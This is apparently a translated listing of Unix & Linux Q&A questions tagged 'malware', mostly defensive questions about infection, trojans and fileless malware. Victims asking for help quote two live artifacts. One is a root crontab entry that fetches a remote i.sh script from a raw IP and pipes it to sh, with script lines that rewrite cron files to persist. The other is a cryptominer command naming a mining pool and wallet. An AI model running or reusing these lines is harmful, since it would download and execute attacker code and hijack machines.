Unix & Linux malware

9

我的Linux机器是否可能被恶意软件感染？我还没有听说过发生在我认识的任何人身上的情况，而且我已经听说过很多次这是不可能的。真的吗？如果是这样，Linux Anti-Virus（安全）软件怎么了？

142 security malware

2

我想在Raspberry Pi上的根crontab文件中添加一些内容，但发现一个对我来说似乎可疑的条目，在Google上搜索它的部分内容没有任何结果。 Crontab条目： */15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh 的内容http://103.219.112.66:8000/i.sh是： export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin mkdir -p /var/spool/cron/crontabs echo "" > /var/spool/cron/root echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root cp -f /var/spool/cron/root /var/spool/cron/crontabs/root …

59 security cron malware

8

没有管理员或sudo特权的用户运行的恶意软件会损害我的系统吗？[关闭]

最近在运行Linux的计算机上发生故障之后，我在用户的主文件夹中找到了一个密码较弱的可执行文件。我已经清理了似乎所有的损坏，但是为了确保可以完全擦拭干净，我正在准备中。非sudo或不受特权的用户运行的恶意软件可以做什么？只是在寻找带有世界可写许可标记的文件进行感染吗？非管理员用户可以在大多数Linux系统上执行哪些威胁性操作？您能否提供这种安全漏洞可能导致的现实问题的一些示例？

30 security malware

2

如何杀死AWS EC2实例上的地雷恶意软件？（受损的服务器）

我在ec2实例上发现了恶意软件，该实例一直在挖掘比特币并使用实例处理能力。我成功地确定了该过程，但是无法将其删除并杀死它。我运行了此命令， watch "ps aux | sort -nrk 3,3 | head -n 5" 它显示了实例上运行的前五个进程，从中发现有一个名为“ bashd ” 的进程，它消耗了30％的cpu。这个过程是 bashd -a cryptonight -o stratum+tcp://get.bi-chi.com:3333 -u 47EAoaBc5TWDZKVaAYvQ7Y4ZfoJMFathAR882gabJ43wHEfxEp81vfJ3J3j6FQGJxJNQTAwvmJYS2Ei8dbkKcwfPFst8FhG -p x 我使用kill -9 process_id命令杀死了这个过程。5秒钟后，该过程再次开始。

26 linux process kill malware

5

安装和使用Wine会使Linux平台对Windows病毒开放吗？

只是想知道是否安装Wine可以为Windows病毒世界打开一个相当可靠的Linux桌面。关于此的任何确认报告吗？然后，您会在Wine下安装Windows防病毒产品吗？

23 security emulation windows malware

4

如何检测和删除Linux木马？

我最近偶然发现： Linux特洛伊木马将近一年被忽略（虚幻IRCd）是的，我知道从不受信任的来源添加一些随机的PPA /软件会带来麻烦（或更糟）。我从来没有这样做，但是有很多人这样做（许多Linux博客和小报都鼓励为新奇的应用程序添加PPA，而没有警告它可能会破坏您的系统甚至更糟，从而危及您的安全性。）如何检测和删除特洛伊木马或流氓应用程序/脚本？

16 security malware

1

如何判断nethogs列表中的神秘程序是否为恶意软件？

这是我在Nethogs中看到的：我担心使用PID ?运行的清单root。我如何找出这些是什么？我正在运行Linux Mint 14。请让我知道我还应该包括哪些其他信息。

12 networking malware

2

无文件恶意软件在Linux上如何工作？

我了解无文件恶意软件的定义：并非基于文件而是仅存在于内存中的恶意代码……更具体地说，无文件恶意代码……将自身附加到内存中的活动进程中…… 有人可以解释一下将其附加到内存中的活动进程如何工作的情况吗？此外，针对此类攻击可以使用哪些（内核）保护/强化措施？

10 process linux-kernel malware

Questions tagged «malware»